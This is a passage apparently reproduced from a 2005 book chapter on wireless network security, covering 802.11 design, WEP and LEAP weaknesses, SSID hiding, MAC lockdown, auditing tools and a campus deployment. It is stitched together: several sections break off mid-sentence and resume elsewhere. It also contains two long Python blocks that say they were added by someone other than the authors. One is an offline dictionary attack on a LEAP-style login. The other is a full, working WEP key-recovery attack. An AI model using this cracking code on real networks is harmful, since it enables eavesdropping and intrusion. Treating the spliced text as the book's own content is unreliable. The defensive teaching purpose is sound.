Inside Network Perimeter Security, Second Edition
Sams Publishing, 800 East 96th Street, Indianapolis, Indiana 46240 USA
Reproduced from the book Inside Network Perimeter Security, 2nd Edition. Copyright 2005, Sams Publishing. Reproduced by permission of Pearson Education, Inc., 800 East 96th Street, Indianapolis, IN 46240. Written permission from Pearson Education, Inc. is required for all other uses.
18 7376 ch14 2/11/05 2:17 PM Page 353
14 Wireless Network Security
Wireless 802.11 networks are becoming more and more popular as a means to augment traditional wire-based LANs within companies. The pervasive nature of wireless communications forces a security perimeter designer to reexamine some of the underlying principles of traditional network architectures. In a wireless world, we can no longer assume that physical infrastructure (walls, doors, guards, and so on) will reliably protect the network against unauthorized external access on Layer 2 (media access) and Layer 1 (physical). To access wireless resources, the attacker only has to be in the proximity of the wireless network, often without even having to enter the building of the potential victim. In this chapter we will briefly examine the fundamental 802.11 wireless technologies, go over popular wireless network encryption protocols and important techniques used to secure wireless networks from attack, look at tools and methods used to audit our secure wireless infrastructure, and then finally review an example of a secure wireless deployment.
802.11 Fundamentals
802.11 is a family of specifications adopted by the Institute of Electrical and Electronics Engineers (IEEE) for implementing wireless LANs. 802.11 is similar to the IEEE 802.3 Ethernet standard in that it maps to Layer 2 and Layer 1 protocols and services.1 As on Ethernet, 802.11 nodes address each other using MAC addresses embedded in their network cards (802.11 arbitrates access to the shared medium with CSMA/CA rather than Ethernet's CSMA/CD, because a radio cannot detect a collision while it is transmitting). However, 802.11 does not rely on wires for carrying signals on Layer 1. This means that 802.11-compliant nodes can wirelessly communicate with each other within a range defined by the specifications and supported by their wireless equipment. Because the wireless aspect of communications is limited to the media access and physical layers, higher-level protocols such as IP, TCP, and UDP do not need to be aware that datagrams are transported without wires.
802.11 networks that are most frequently deployed within companies require the use of one or more access points (APs). An AP is a device that facilitates wireless communications between 802.11 nodes and bridges the organization's wireless and wired networks. In this configuration, known as infrastructure mode, wireless nodes must go through the AP when communicating with each other and with nodes on the wired network. Alternatively, wireless networks can be deployed using an ad hoc topology, in which case participating 802.11 nodes communicate directly with each other on a peer-to-peer basis.2
Three main types of 802.11 networks are in use today:
• 802.11b—This was the first standard to really catch on for wireless networking. It runs at 11Mbps, uses the 2.4GHz band, and has a range of up to 300 feet. It is also the most common 802.11 network type. A need for transfer speeds greater than 11Mbps created demand for 802.11a equipment.
• 802.11a—802.11a network components run at an improved bandwidth of 54Mbps and use the 5GHz band, which suffers fewer conflicts with typical appliances such as cordless phones and microwave ovens. The 802.11a specification allows for up to 12 non-overlapping channels, as opposed to the three non-overlapping channels of the 2.4GHz standards, so it supports a greater number of stations per wireless network. However, because it uses a different frequency band, 802.11a offers no built-in compatibility with already deployed 802.11b equipment. Also, 802.11a equipment is much pricier and has a shorter range than its 2.4GHz counterparts (about 50 feet at the full 54Mbps).
• 802.11g—Many people have waited to fulfill their wireless bandwidth requirements with the 802.11g standard. With a speed of 54Mbps and using the 2.4GHz band, 802.11g equipment is backward compatible with the more popular 802.11b standard and offers a similar range of up to 300 feet, allowing full 54Mbps speeds at as far as about 100 feet. 802.11g equipment offers the speed of 802.11a, at a more competitive price and with backward compatibility with 802.11b, making for a much easier and less expensive upgrade path.
Network Design
The most important aspects to securing a wireless network are the way it is designed and the way it interfaces to your wired network. No matter what features you use to secure your wireless infrastructure, there will always be ways to defeat them. By utilizing a solid network design strategy, you can make it harder for attackers to reach your wireless network. This can also add more controls to your wireless segments and protect your wired network from its wireless counterparts. In this section we will examine the use of firewalls and routers to exact the same kind of controls on wireless networks that you can on wired networks, and the prevention of signal leakage through proper AP placement and wireless signal dampening.
[Figure residue (apparently Figures 14.1 and 14.2, diagrams not reproduced): access points attached to the production switch and production network, with and without an intervening firewall; captions not recoverable.]
Finally, in cases where the APs themselves fall into different risk levels, it is possible to separate each of them into its own security zone, on a multileg firewall or multiple-interface router (see Figure 14.3).

A design like the one pictured in Figure 14.3 may be useful in environments such as college campuses, where instructors and students might have very different rights to production resources.
As enterprise-class APs are developed, more and more of the same important security features incorporated into wired network switches are being integrated into APs. Access points have been produced that support the configuration of Quality of Service (QoS) and VLANs on the AP itself! This way, the AP can help control the QoS considerations for connected wireless clients and can group the traffic into security zones with different levels of risk using VLAN technologies. This is a major improvement over past APs, which basically acted like "dumb hubs." With a multi-VLAN AP, an important design consideration is how it will be integrated into your wired network. The connection between it and your production switch will most likely be an 802.1q trunk, which can propagate the same poor design considerations as demonstrated in the example in Figure 14.1. Placement of a firewall that supports 802.1q trunking between the AP and the switch would be recommended for exacting Layer 3+ controls on your wired networks. At the minimum, Layer 3 controls can be forced by configuring unique VLANs to support the wireless networks on the attached wired switches, forcing wireless traffic to go through a Layer 3 device for access to the rest of the wired network (see Figure 14.4). For more information on the separation of the network into security zones and the use of trunking, refer to Chapter 13.
Figure 14.3 By segmenting the APs into their own security zones, we protect our wireless resources from each other. [Diagram not reproduced: access points, firewall, production switch, production network.]
Note
You can find information on trunking, the Cisco Firewall Services Module (FWSM), and the Check Point VSX in Chapter 13.
No matter which of these wireless network designs suits your business needs best, an important point to take away from this section is that adding Layer 3+ controls at the edge of your wireless network provides the type of control you take for granted between your wired network security zones.
[Figure 14.4 (diagram not reproduced): a multi-VLAN AP connected to the production switch over an 802.1q trunk carrying VLANs 10-12, with Vlan 11 and Vlan 12 labelled; caption not recoverable.]
wireless DoS, though commercial packages to track down wireless transmitters (and more) are now available, such as Airmagnet (www.airmagnet.com).

The main defense against wireless denial of service (short of triangulating the source and tracking it down) is again the use of solid design fundamentals, such as those we have discussed in the last two sections. Being able to segregate the DoS away from your production network via a firewall or other control devices is ideal. QoS controls can also be implemented at the edge of the wireless DMZ. Network intrusion detection sensors can be placed at the point where your wireless and wired networks join. Finally, all the means used to keep signal leakage in can also help keep the wireless DoS out. Though no foolproof method of defense is available for wireless DoS, a proper design can go a long way toward threat mitigation.
Wireless Encryption
Although wired Ethernet-based networks do not incorporate encryption at the media access and physical layers, 802.11 designers developed specifications for encryption mechanisms to allow authentication and encryption of communications between wireless nodes on Layers 1 and 2. Wireless encryption is meant to guard against eavesdropping and limit access to the wireless infrastructure, thus protecting against the inherently "public" nature of wireless communications that allows them to pass through walls and other physical barriers.4 An attacker is much more likely to gain access to the wireless network if the organization has not enabled an encryption method or related access-control mechanisms in its 802.11 deployment. An inexpensive reconnaissance experiment in 2001 by security enthusiasts in the Boston area detected hundreds of 802.11 access points, only 44% of which had encryption enabled.5 Remember that any encryption is better than no encryption. Many wireless attackers are simply looking for a jumping-off point from which they can launch further attacks. If an attacker finds a network with poor encryption and one with no encryption, it is very likely he will attack the network with no encryption. After all, why bother going through all the work to crack weak encryption when he can immediately access the unprotected network?
The paper "Weaknesses in the Key Scheduling Algorithm of RC4," by Scott Fluhrer, Itsik Mantin, and Adi Shamir, discusses flaws in RC4 in great detail, including issues with the way RC4 is used in WEP, where a 24-bit initialization vector (IV) sent in the clear is simply prepended to the secret key to form the per-packet RC4 key. The authors state that "when the same secret part of the key is used with numerous different exposed values, an attacker can rederive the secret part by analyzing the initial word of the keystreams with relatively little work."6 In WEP the initial word of the keystream is always exposed, because the first plaintext byte of every data frame is the fixed LLC/SNAP header. In turn, countless programs have been developed to exploit this weakness in WEP, including WEPCrack and AirSnort, both of which will be covered later in this chapter. For more information on the vulnerabilities of WEP and RC4, check out "Weaknesses in the Key Scheduling Algorithm of RC4," which is available all over the Internet.
Note
The fact that some implementations of RC4 are weak does not mean that RC4 itself is broken. Properly implemented (in particular, never forming the RC4 key by concatenating a public value such as an IV with a long-lived secret), RC4 was considered secure at the time of writing. For more information, check out "RSA Security Response to Weaknesses in Key Scheduling Algorithm of RC4" at http://www.rsasecurity.com/rsalabs/node.asp?id=2009. (Since then, statistical biases in the RC4 keystream itself have led to its deprecation in general; RFC 7465, for example, prohibits RC4 cipher suites in TLS.)
Despite the inherent weaknesses in WEP, it is still deployed today. If WEP is your only choice, it is better than no encryption at all. However, you should consider WEP to be broken and should replace it if at all possible.7 Some vendors have strengthened WEP by incorporating an authentication protocol such as LEAP into their products, adding per-user authentication and dynamically generated per-session WEP keys. Though these benefits mitigate some of the exploitable weaknesses of WEP deployments, there has still been a lot of talk recently about the security of LEAP itself. At DEFCON in August of 2003, Joshua Wright revealed that LEAP is vulnerable to offline dictionary attacks.8 This is due to limitations inherited from the MS-CHAP challenge/response it is built on, including the facts that the username travels in the clear (immediately giving up half of what an attacker needs), that the challenge and the response to it can be captured by anyone in range, and that the password hash from which the response is computed is not salted.
What Is a Salt?
A salt is a random value that is combined with data before it is hashed, so that two users with the same password do not end up with the same hash, and so that a table of hashes precomputed for a dictionary cannot be reused against every captured hash. You can determine the value of a password that was hashed without a salt by running the same hashing algorithm over password guesses and comparing the resulting hashes against the original password hash. When the hashes match, you have successfully guessed the password!
The LEAP dictionary attack makes an excellent case for the necessity of a strong password policy. This attack only works well when the password guesses can be easily generated via a source such as a predefined password dictionary. If complex passwords are used, this assault will not work, and it is very unlikely that a brute force attack using the same methodology would give timely results.
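The offline attack the LEAP paragraph and the salt sidebar describe, as an added example (my code, not the book's and not asleap): a sniffed username, challenge and response, a dictionary run against it, and the effect of a salt. MS-CHAP's real primitives (the MD4 NT hash and the three DES encryptions of the challenge) are replaced here by SHA-256 and HMAC so the example runs on a stock Python; any deterministic keyed function of the hash and the challenge shows the same weakness. The users, passwords and dictionary are constructed, and the function names are mine.

```python
"""Offline dictionary attack on a sniffed challenge/response, and why a salt blunts it."""
import hashlib
import hmac
import os
from collections import namedtuple

Capture = namedtuple("Capture", "username challenge response")  # what a sniffer sees of one login


def password_hash(password, salt=b""):
    """Stand-in for the unsalted NT hash (MD4 of the UTF-16LE password) that MS-CHAP, and so
    LEAP, use. SHA-256 is substituted so this runs anywhere; the salt parameter is the
    hardening the real protocol lacks."""
    return hashlib.sha256(salt + password.encode("utf-16-le")).digest()


def response_for(pw_hash, challenge):
    """Stand-in for the MS-CHAP response (really three DES encryptions of the challenge under
    keys cut from the NT hash). It is a deterministic function of (hash, challenge) only."""
    return hmac.new(pw_hash, challenge, hashlib.sha256).digest()


def client_login(password, challenge, salt=b""):
    """The client's side: username and challenge cross the air in the clear, then this response."""
    return response_for(password_hash(password, salt), challenge)


def precompute(dictionary, salt=b""):
    """Hash every dictionary word once. Without a salt this table serves every capture, forever."""
    return {password_hash(word, salt): word for word in dictionary}


def crack(capture, table):
    """One cheap response computation per table entry, no hashing of passwords at all."""
    for pw_hash, word in table.items():
        if hmac.compare_digest(response_for(pw_hash, capture.challenge), capture.response):
            return word
    return None


DICTIONARY = ["password", "letmein", "Summer2005", "wireless", "cisco123"]  # constructed


def demo():
    """Returns (unsalted results by user, salted capture vs the old table, vs a rebuilt table)."""
    c1, c2 = os.urandom(8), os.urandom(8)
    seen = [Capture("jsmith", c1, client_login("Summer2005", c1)),       # dictionary word
            Capture("mjones", c2, client_login("Tr0ub4dor&3!xq", c2))]   # complex password
    table = precompute(DICTIONARY)                   # built once, reused against both users
    unsalted = {c.username: crack(c, table) for c in seen}
    salt = os.urandom(8)                             # per-user salt the server would store
    salted = Capture("jsmith", c1, client_login("Summer2005", c1, salt))
    return unsalted, crack(salted, table), crack(salted, precompute(DICTIONARY, salt))


if __name__ == "__main__":
    print(demo())
```

The dictionary password falls to the precomputed table, the complex one does not, and the same table is useless against the salted login: with a salt the attacker has to rebuild the hash table per user (and per salt), which is the cost the unsalted NT hash lets the attacker skip.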
Note
For more information on the LEAP dictionary attack vulnerability, check out "Weaknesses in LEAP Challenge/Response" (http://home.jwu.edu/jwright/presentations/asleap-defcon.pdf) and "Cisco Response to Dictionary Attacks on Cisco LEAP" (http://www.cisco.com/en/US/products/hw/wireless/ps430/prod_bulletin09186a00801cc901.html).
TinyPEAP
Now that a known offline dictionary attack is available against the pre-shared key version of the new industry wireless security standard WPA, implementing an authentication server to defend your wireless environment is more important than ever. One interesting option is called TinyPEAP (www.tinypeap.com). It embeds a simple RADIUS server into firmware that can be added to Linksys WRT54G/GS model wireless routers. Though most likely only an ideal solution for home and small-office networks, it's a novel idea nonetheless! Perhaps one day all APs will come with integrated RADIUS servers.
EAP-TLS is the EAP method most closely associated with the 802.1X/EAP authentication framework adopted in the newly ratified IEEE 802.11i security standard (802.11i mandates 802.1X for enterprise authentication but does not mandate a particular EAP method). It is similar to the other EAP protocols we mentioned; however, it requires digital certificates on both wireless clients and authentication servers, demanding the implementation of a Public Key Infrastructure (PKI) for digital certificate management. This makes EAP-TLS the most secure of the EAP standards in this section and the most costly and complicated to deploy and manage.
• A proven algorithm and suitably large key (128+ bit) makes for good security.
Keep these points in mind when determining which technology is the best security fit for your environment and when deploying the technology, to maximize your environment's protection.
The wireless networking client in Windows XP will pop up a list of available networks when a wireless host first connects to a network. These networks are discovered from the SSID advertised in the beacons their access points broadcast. In the early days of wireless, many uninformed network practitioners thought that changing the SSID to something other than the manufacturer's default was a "hardening technique." However, client scanning shows all SSID broadcasts in the area. The only benefit that changing the SSID provides is the prevention of the instant identification of the AP vendor.

Despite the ease of administration broadcasting SSIDs offers, a modest way to raise the bar is to disable SSID broadcasts on all wireless access points. This will help prevent casual outsiders from easily discovering your access points. On the downside, this means that all wireless clients will need to be manually configured with the SSID of the network they are a part of.
Wardriving
Wardriving is the term for searching out wireless access points, mostly ones that have no or poor security. It takes its name from "wardialing," which hackers used in the years of dial-up connectivity and modems. Hackers would program wardialing programs to dial up hundreds of phone numbers looking for modems and PBXs that could be compromised. Wardriving involves a similar process by which attackers drive around with a laptop or PDA with wireless capabilities and attempt to locate APs using detection tools such as Netstumbler and Mini-Stumbler. These tools search for SSIDs being advertised by the wireless access points. After finding APs, attackers sometimes draw symbols with chalk on the pavement near where the APs were found. This is called warchalking. Silencing SSID broadcasts may keep your AP out of the results of SSID-based tools such as these, though not out of a passive sniffer's. Remember, your users are not the only people trying to connect to your AP!
It is important to keep in mind that suppressing SSID broadcasts, though a reasonable security step, does not guarantee a secure access point. Attackers with wireless sniffers can still examine communication flows between clients and APs and determine the SSID, even with broadcasts disabled: the SSID travels in the clear in every probe request and association request a legitimate client sends, and a client configured for a hidden network will probe for it by name wherever it goes. Hiding the SSID does, however, prevent your wireless clients from accidentally logging in to the wrong AP, and it prevents outsiders and attackers from accidentally logging on to yours.

More important, the use of strong authentication and encryption methods goes a long way to mitigate the issues caused by SSID broadcasts. It does not matter that an attacker knows your wireless network is there if there are no exploits to run against it and your authentication methods are solid.
FakeAP
FakeAP is a Linux-based program that can thwart wardrivers by creating the appearance of thousands of APs on AP-detection tools such as Netstumbler. Attackers won't know which of the thousands of access points are legitimate and which are "ghosts" generated by FakeAP. Check it out at http://www.blackalchemy.to/project/fakeap/.
unfortunately is not entirely true. Again, this is a good step toward a strong security posture, but with the right equipment this defense can easily be bypassed. All an attacker needs to do is use a wireless sniffer to watch communication flows between a client and AP. Once the attacker records the MAC address of an allowed client, he can easily spoof the MAC address in question and begin communicating with the locked-down AP. He may need to run a DoS (or the like) against the original owner of the MAC address to keep it from interrupting his communications, or he may need to wait for that client to disconnect from the network.

Having to lock down the MAC addresses for all the wireless nodes in a large network is an administrative nightmare. However, in environments where security needs to be maximized, locking down the MAC addresses of nodes adds an additional layer of complexity that an attacker needs to bypass. The more steps an attacker needs to take to compromise your security, the more likely he is to give up.
Miscellaneous AP Hardening
Many additional steps can be taken to help lock down your wireless access point against attacks. First and foremost, always change the default password on the AP before putting it into production. Be sure to follow best practices for a complex password. Also, try to lock down AP management mechanisms as much as possible. Try to disable web management via wireless devices and lock down wired management as much as your AP will allow. If an out-of-band management method is available for your AP, it is highly recommended that you take advantage of it.
Many APs have the ability to bridge themselves to other APs. It is a good idea in a single-AP environment to disable this capability. In a multi-AP environment, lock down your APs' intercommunication by MAC address. This can be overcome, as mentioned in the section on MAC address lockdown, but it's still worthy of completion.
As previously alluded to, make sure that up-to-date firmware is installed on a newly purchased AP. Also, track firmware updates that repair security vulnerabilities. Newer firmware versions will support additional security features, more robust and cutting-edge encryption algorithms, and new industry security standards.
Proper passwording, secured management, and up-to-date firmware are all important parts of locking down your access point. Hardening your AP is a key in securing your wireless network.
VPN/IPSec
When it was originally discovered that WEP was broken, many security analysts suggested implementing VPN technologies or host-to-host IPSec on wireless clients. This added an additional layer of confidentiality and authentication between wireless hosts and destination resources. All traffic is encrypted from the client to the destination (including across the wired network) without fear of WEP being cracked. Configuring transport mode IPSec is easily done for all traffic between hosts or just for certain protocols. Also, this requires an additional level of authentication for the client and server to communicate. For more information on IPSec or configuring it for transport mode operation, check out Chapter 7, "Virtual Private Networks."
Host Defenses
Many of the host-based defenses in Chapter 10, "Host Defense Components," are very beneficial for the wandering wireless client. Wireless networking technologies expose our clients at Layer 2 and below to assaults from anyone within range. Using host IDS and a firewall on a wireless client are excellent steps to prevent airborne attacks. Both will help you be aware of and defend against an attempted attack, whether you are connected to your office wireless network or on the road. Also, both act as additional "sensors" for your wireless network's security. Hosts may pick up wireless DoS or other attacks before they get to your wired network defenses. Strong host defenses are an important part of keeping your wireless environment secure.
advisable that you wield an external antenna, similar to the ones an attacker would use, to increase your range. The small omni-directional antennas that are integrated into most wireless PC cards have a fraction of the range of a directional antenna such as a Yagi. A chart of wireless coverage for an omni-directional antenna is almost spherical, whereas a Yagi directional antenna is more like a column stretching many times the distance of the "omni" in the direction the antenna is being pointed.
Warning
Remember that a wireless signal can be affected by interference, reflection, and outside factors. Though you may not be able to access your network from the parking lot today, you may be able to hit it from beyond there next week. Perform regular audits with varying equipment and tools, but don't rely on signal control as your sole defense mechanism.
Start by walking the perimeter of your environment with a tool such as Netstumbler (http://www.netstumbler.com) or, even better, Kismet (http://www.kismetwireless.net), which can find any valid access points you are using. Netstumbler is easy to load, easier to use, and can be run on popular handheld devices (Mini-Stumbler) as well as the ever-pervasive Windows operating systems. However, it is an active scanner: it sends out probe requests and lists the APs that answer, so an AP configured not to advertise its SSID (and therefore not to answer broadcast probes) will not show up, and it does not look beyond those responses. Do not rely on Netstumbler as your sole auditing tool because you'll gain a false sense of security from your results. Other programs such as Kismet work passively, putting the card into monitor mode and recording every 802.11 frame they hear; they find APs and clients whether or not an SSID is advertised, and they can recover a hidden SSID from the probe and association frames of legitimate clients. Kismet, however, is currently only available for Linux. In any case, either program may be used by an attacker looking for your network. When walking the grounds with either tool, take note of which APs can be located from public areas, including lobbies, restrooms, and other publicly accessible areas in your building. Finally, take a walk through your building and pay particular attention to SSIDs you don't recognize. A major security hole can be added to the most secure network when an end user deploys his own access point or configures a wireless NIC to be part of its own ad hoc environment. Believe it or not, this happens more often than you would expect. An executive feels tethered to his desk by a network cable, so he plugs in an AP (running without encryption, of course) and pops a wireless NIC into his laptop. Talk about an attacker's dream!
Another good practice is running a sniffer capable of examining wireless traffic—such as Airmagnet, Ethereal (http://www.ethereal.com), or the like—and examining the information you are sending in the clear. You might be interested to find out what information an attacker can see even when your network is properly protected by MAC address lockdown, disabled SSID broadcasts, and strong encryption. Also confirm that the encryption protocols running on your network are the ones you deployed. Knowing your weaknesses is the first step in buttressing your fortress!
Auditing Encryption
Once you are confident the information being sent through the air in your environment is all encrypted, it is a good idea to run any available cracking tools to confirm that your
AirSnort
AirSnort is a freeware Linux-based sniffer that intercepts and decodes WEP-encrypted packets (it has also recently been ported to Windows XP). AirSnort works by promiscuously capturing wireless packets. After approximately 100MB–1GB of wireless data has been gathered, AirSnort can "guess the encryption password in under a second."11 AirSnort accomplishes this by exploiting the vulnerability in the key scheduling algorithm of RC4 discovered by Scott Fluhrer, Itsik Mantin, and Adi Shamir (as discussed in the section on WEP encryption, earlier in this chapter).

AirSnort needs to collect many wireless packets before cracking the WEP key because, according to the program's documentation, out of the roughly 16 million 24-bit initialization vectors (IVs) that a wireless card can prepend to the shared key, about 3,000 produce "weak" RC4 keys, and each packet sent under a weak IV leaks a little information about one byte of the key. After the program gathers enough weak-IV packets, it is able to recover the WEP key and decode WEP-protected packets.
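The weak-IV attack described in the WEP encryption section earlier and in the AirSnort note above, as an added worked example (my code, not the book's and not AirSnort's or WEPCrack's): textbook RC4, WEP framing with its CRC-32 integrity check value, and the Fluhrer-Mantin-Shamir key recovery run against a constructed capture. What is assumed: a 40-bit key (0a1b2c3d4e, chosen for the demo); that the AP happened to transmit frames under the classic weak IVs (A+3, 255, X) for each key byte position A; and that the first plaintext byte of every frame is the 0xAA of the LLC/SNAP header, which is what tells the attacker the first keystream byte. The function names are mine.

```python
"""WEP key recovery from "weak" IVs (Fluhrer-Mantin-Shamir), run on constructed traffic."""
import struct
import zlib
from collections import Counter

N = 256                 # RC4 permutation size
SNAP_DSAP = 0xAA        # first plaintext byte of every WEP data frame (LLC/SNAP header)


def rc4_keystream(key, length):
    """Textbook RC4: key scheduling, then `length` bytes of keystream."""
    S = list(range(N))
    j = 0
    for i in range(N):                                   # KSA
        j = (j + S[i] + key[i % len(key)]) % N
        S[i], S[j] = S[j], S[i]
    i = j = 0
    out = bytearray()
    for _ in range(length):                              # PRGA
        i = (i + 1) % N
        j = (j + S[i]) % N
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % N])
    return bytes(out)


def crc32_icv(data):
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(secret, iv, plaintext):
    """WEP frame body: 3-byte IV in the clear, then RC4(IV || secret) XOR (plaintext || ICV)."""
    data = plaintext + crc32_icv(plaintext)
    ks = rc4_keystream(iv + secret, len(data))
    return iv + bytes(a ^ b for a, b in zip(data, ks))


def wep_decrypt(secret, frame):
    """Returns the plaintext if the ICV verifies under `secret`, else None."""
    iv, body = frame[:3], frame[3:]
    ks = rc4_keystream(iv + secret, len(body))
    data = bytes(a ^ b for a, b in zip(body, ks))
    plaintext, icv = data[:-4], data[-4:]
    return plaintext if crc32_icv(plaintext) == icv else None


def fms_votes(known_prefix, captured):
    """Vote for secret byte A = len(known_prefix), i.e. RC4 key byte K[A+3].

    captured: list of (iv, first ciphertext byte). The first A+3 KSA steps are replayed
    with the bytes the attacker knows (IV plus already recovered prefix). If the state is
    "resolved" (S[1] < A+3 and S[1]+S[S[1]] == A+3), then with probability about 5% the
    first keystream byte z equals the value swapped into S[A+3] at step A+3, which gives
    K[A+3] = S^-1[z] - j - S[A+3]. Wrong guesses are spread almost uniformly."""
    A = len(known_prefix)
    votes = Counter()
    for iv, c0 in captured:
        key = list(iv) + list(known_prefix)
        S = list(range(N))
        j = 0
        for i in range(A + 3):
            j = (j + S[i] + key[i]) % N
            S[i], S[j] = S[j], S[i]
        if not (S[1] < A + 3 and (S[1] + S[S[1]]) % N == A + 3):
            continue                                     # IV not useful for this byte
        z = c0 ^ SNAP_DSAP                               # first keystream byte is known
        votes[(S.index(z) - j - S[A + 3]) % N] += 1
    return votes


def recover_key(key_len, captured_by_pos, check_frame, depth=8):
    """Depth-first search over the `depth` best-voted candidates per byte; a full key is
    accepted only if it decrypts `check_frame` with a valid ICV (the "fudge factor" idea)."""
    def search(prefix):
        if len(prefix) == key_len:
            return prefix if wep_decrypt(prefix, check_frame) is not None else None
        votes = fms_votes(prefix, captured_by_pos[len(prefix)])
        for cand, _ in votes.most_common(depth):
            found = search(prefix + bytes([cand]))
            if found is not None:
                return found
        return None
    return search(b"")


def weak_iv_capture(secret):
    """Constructed stand-in for a sniffer log: for secret byte A the AP used the weak IVs
    (A+3, 255, X), X = 0..255, on frames that start with the SNAP header. Only the IV and
    the first ciphertext byte are kept, which is all FMS needs."""
    body = bytes([SNAP_DSAP, 0xAA, 0x03, 0, 0, 0, 0x08, 0x00]) + b"constructed payload"
    capture = []
    for A in range(len(secret)):
        ivs = [bytes([A + 3, 255, x]) for x in range(N)]
        capture.append([(iv, wep_encrypt(secret, iv, body)[3]) for iv in ivs])
    return capture


def demo(secret=bytes.fromhex("0a1b2c3d4e")):
    """Recover a 40-bit WEP key from constructed weak-IV traffic; returns the recovered key."""
    capture = weak_iv_capture(secret)
    check = wep_encrypt(secret, b"\x10\x20\x30", bytes([SNAP_DSAP, 0xAA, 0x03]) + b"any frame")
    return recover_key(len(secret), capture, check)


if __name__ == "__main__":
    print(demo().hex())
```

Run it and it prints the key it was never given. Each weak IV yields a correct vote only about one time in twenty, which is why the real tools need so much traffic and why the candidate search with ICV verification matters when the right byte is not the top vote. Keying RC4 with a hash of IV and secret instead of their concatenation (or, better, replacing WEP) removes the correlation the votes depend on.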
Do not consider this list as exhaustive. New vulnerabilities may appear at any time, and you need to update your auditing tools as regularly as your attackers will.

Based on these basic requirements and the secure design elements we have discussed in this chapter, our proposed design is illustrated in Figure 14.5.
[Figure 14.5 (diagram not reproduced): Production Network; Admin ESS; Public ESS; Instructor ESS; 802.1q trunks; RADIUS server for Admin wireless networks; RADIUS server for Public wireless networks.]
The key to this design is the functionality of the Cisco Aironet 1200 series access point that is used for the public wireless networks—that is, the Faculty, Student, and Visitor networks. The Aironet 1200 supports multiple VLANs and a unique security policy on each VLAN. Each of the wireless networks is deployed as its own Extended Service Set (ESS), or basically as its own separate wireless network, with each being configured as an independent VLAN on the Aironet. Two APs are deployed to extend the range to cover the required service area of the campus. However, with this added coverage comes added exposure, which is why security is paramount. Both Aironets are trunked to the central 650x Series switch, which has a Firewall Services Module (FWSM) installed in it. The FWSM allows the trunked VLANs to be firewalled from each other as well as from the rest of the wired network.
From a security perspective, each of the three networks is configured differently. The Visitor VLAN security policy is configured to support no encryption, as specified in the network requirements. MAC address authentication is disabled because anyone should be able to access the Visitor ESS. No authentication is required, but connections are logged and the FWSM is configured to only allow the Visitor network access to the Internet and certain public resources at the university.
The Student VLAN security policy is configured to support WPAv2 Enterprise and uses a RADIUS server that is protected by the FWSM. This strong security algorithm is critical in the campus environment to protect critical university resources from outside access. Because the university grounds are basically an unsecured public space, an interloper with a laptop could wander right into range without drawing any suspicion. Therefore, a secure protection algorithm combined with strong authentication can greatly increase the security of the university network. Also, specific firewall rules are added for the Student VLAN to only allow access to student resources. SSID broadcasts are enabled because we will not be able to configure all of the students' laptops, and MAC address authentication is disabled. RADIUS authentication will be used for student access, which will steer the students to the correct VLAN using a feature of the Aironet AP that places each authenticated client in the VLAN (and thus the ESS) the RADIUS server returns for it.
The Faculty ESS VLAN security policy is also configured to support WPAv2 Enterprise and uses the same protected RADIUS server. This strong protection protocol and authentication method is vital not only to protect the faculty resources from outside attackers, but also to protect them from curious students who may want to take a closer look at their grades. Again, the FWSM is used to allow only access to faculty resources and defend the wired network from the wireless network. Broadcasts are not required in this case, but due to the fact that we have RADIUS configured to assign clients to the correct VLAN, we can save ourselves a lot of administrative work by keeping broadcasts enabled. MAC address authentication will be enabled for the Faculty VLAN to add an additional level of security.
Faculty laptops are deployed using host-hardening best practices and installed with host-based defense components. Not only will this help protect the Faculty network from direct wireless attacks, it will help the university be aware of events occurring on the wireless network.
Finally, the Admin network is configured quite differently from the public wireless network. Though in a highly secure environment wired connectivity would be strongly suggested over wireless, sometimes business requirements force the use of inherently less-secure solutions. In this case, the administrators are the ones making the decisions and they want the flexibility of wireless networking in the administration area. With this in mind, the highest level of wireless networking security must be applied to the administrators' network. The center of the design is a single AP deployed in a carefully chosen point in the administration office area, thus minimizing access from the outside (as demonstrated in Figure 14.6).
[Figure 14.6 (diagram not reproduced): placement of the Admin Access Point relative to the two Multi-VLAN Access Points; caption not recoverable.]
Signal leakage will be minimized by using signal-limiting window tint on all offices. Also, because redecorating is not allowed in the admin area, the ceilings below their second-floor offices will be painted with signal-limiting metallic-based paint. The Admin AP will be a different manufacturer than the public APs to help enable additional defense in depth. However, with this decision comes additional administrative costs, because support personnel need to be trained on more than one product type. Broadcasts will be disabled and MAC address authentication will be configured. WPAv2 Enterprise is enabled and a separate RADIUS server is used for authentication.
Host-hardening best practices are used and the same host-defense components are installed on the administrators' laptops. Also, because security is paramount in their environment, the administrators' laptops are configured to use transport mode AH IPSec connectivity to critical resources they need to access, such as student grades, confidential employee information, and business information that is not publicly available. We have chosen AH because it has less overhead than ESP, and because we have implemented WPAv2 using AES encryption, we are not terribly concerned about the confidentiality being breached in the Admin network. Because AH authenticates the packet but leaves the payload unencrypted, the traffic remains subject to IDS scans and content inspection once it has left the AP. At the same time, AH adds another level of authentication that needs to be passed to gain access to critical resources.
An additional firewall is deployed between the Admin wireless network and the production network to control access to production wired resources.
This design employs many of the security options we have covered in this chapter. A strong network design is the foundation of this plan. Despite the fact that wireless may not be ideal for parts of this network, business requirements justify the security tradeoff. Therefore, maximizing the security posture through the use of all means available is paramount. Defense-in-depth methodologies are used throughout and a proven encryption algorithm enhances the network's security. Finally, all devices are properly hardened using best practices and the design is continually audited as a means of ongoing verification.
Summary
Many concerns are involved in securing wireless networks. A solid network design with proper Layer 3+ controls and controlled signal leakage are all part of an important start. Using proper, proven encryption algorithms and authentication, disabling SSID broadcasts, locking down MAC addresses, and hardening your access point are all vital in the proper security of your wireless network. Employing defense in depth with host-based security mechanisms and IPSec rounds out the network's security. Auditing the design with popular AP detection tools, wireless sniffers, and encryption-cracking tools validates your work.
Although no one suggestion in this section is a foolproof defense for wireless security, using the combination of these security techniques will help keep your network off the attacker's radar and make compromising it a much more difficult task. Because undefended wireless networks are in such great number at this time, the more protected your wireless network is, the less likely an attacker will waste his time pursuing it. The reality of network security is that in environments that need to be highly secure, wired networking should be deployed. It is less expensive and easier to lock down than its wireless counterpart. However, when business needs dictate that wireless networking is to be used in your environment, deploying solid wireless network security methods, as covered in this chapter, will prove invaluable to your organization.
References
1 Intelligraphics. "Introduction to IEEE 802.11." http://www.intelligraphics.com/articles/80211_article.html. December 2001.
2 Jim Zyren and Al Petrick. "IEEE 802.11 Tutorial." http://www.packetnexus.com/docs/IEEE_80211_Primer.pdf. December 2001.
